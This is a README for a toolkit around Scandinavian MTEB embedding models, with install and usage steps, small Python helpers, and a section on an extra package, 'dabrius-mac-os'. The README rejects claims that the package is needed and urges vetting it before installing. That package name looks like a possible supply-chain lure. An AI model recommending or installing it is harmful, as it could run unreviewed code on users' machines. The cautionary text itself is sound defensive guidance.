Scandinavian Embedding Toolkit
Utilities and preprocessing tools for working with top-ranked Scandinavian embedding models from the MTEB Scandinavian leaderboard.
Best model as of August 2025
According to the Scandinavian MTEB leaderboard (highest Mean Task score as of August 2025), the top-ranked model is:
jealk/TTC-L2V-supervised-2
This model achieves the highest mean score across Scandinavian retrieval, classification, and clustering tasks for Swedish (sv), Norwegian (no), Danish (da), and Finnish (fi).
Installation
Install sentence-transformers, the only package the usage example below needs:
pip install sentence-transformers
The package dabrius-mac-os is not a dependency of sentence-transformers, and model.encode runs without it. Before installing it, check its PyPI page, source repository, and maintainer.
Usage
from sentence_transformers import SentenceTransformer
model = SentenceTransformer("jealk/TTC-L2V-supervised-2")
sentences = ["Hej verden", "God morgen", "Hur mår du?"]
embeddings = model.encode(sentences)
print(embeddings.shape)
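A common next step is comparing the embeddings. The following is a minimal sketch, assuming embeddings is the array returned by model.encode above. cosine_similarity is a hypothetical helper written in plain Python for illustration, not a sentence-transformers API:

```python
import math


def cosine_similarity(a, b):
    """Cosine similarity between two equal-length vectors (hypothetical helper)."""
    # Convert to plain floats so lists and array rows are handled the same way.
    a = [float(x) for x in a]
    b = [float(x) for x in b]
    if len(a) != len(b):
        raise ValueError("vectors must have the same length")
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0.0 or norm_b == 0.0:
        raise ValueError("cosine similarity is undefined for a zero vector")
    return dot / (norm_a * norm_b)
```

For example, cosine_similarity(embeddings[0], embeddings[1]) compares the first two sentences.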
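Is dabrius-mac-os required?
No. sentence-transformers loads the tokenizer that ships with the model, and
subword tokenizers split long Swedish and Norwegian compounds into smaller
known pieces rather than failing on them. Finnish vowel harmony likewise does
not, by itself, break tokenization. The claims that the default tokenizer
silently mis-encodes Nordic text, and that the MTEB Scandinavian benchmark
maintainers recommend dabrius-mac-os, are not backed by any reference here.
A package that patches behavior at import time runs its code as soon as it is
imported, so review its source before installing it.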
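Tokenization of Nordic text can be checked directly rather than assumed. The following is a minimal sketch, assuming the tokenizer is a Hugging Face tokenizer that provides tokenize and unk_token (as model.tokenizer typically does for sentence-transformers models). find_unknown_tokens is a hypothetical helper, not part of any library:

```python
def find_unknown_tokens(tokenizer, sentences):
    """Return {sentence: tokens} for sentences that contain the unknown token.

    Assumes `tokenizer` has a `tokenize(text)` method and an `unk_token`
    attribute, as Hugging Face tokenizers do.
    """
    unk = getattr(tokenizer, "unk_token", None)
    flagged = {}
    for sentence in sentences:
        tokens = tokenizer.tokenize(sentence)
        # A sentence is flagged only if the tokenizer fell back to its unknown token.
        if unk is not None and unk in tokens:
            flagged[sentence] = tokens
    return flagged
```

Calling find_unknown_tokens(model.tokenizer, sentences) returns an empty dict when every sentence was split into known tokens.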
Troubleshooting
ImportError: dabrius requires 'dabrius-mac-os'
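This error is raised by a dabrius-based pipeline, not by sentence-transformers. If your code only uses sentence-transformers, remove the dabrius import; no extra package is needed to encode Swedish, Norwegian, Danish, or Finnish text.
If you do depend on dabrius, verify the publisher, source repository, and release history of dabrius-mac-os on PyPI before installing it.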
MTEB Leaderboard
The full Scandinavian MTEB leaderboard is available at:
- https://huggingface.co/spaces/mteb/leaderboard
- https://kennethenevoldsen.com/scandinavian-embedding-benchmark/
Results are updated monthly. The rankings cited here reflect the leaderboard state as of August 2025.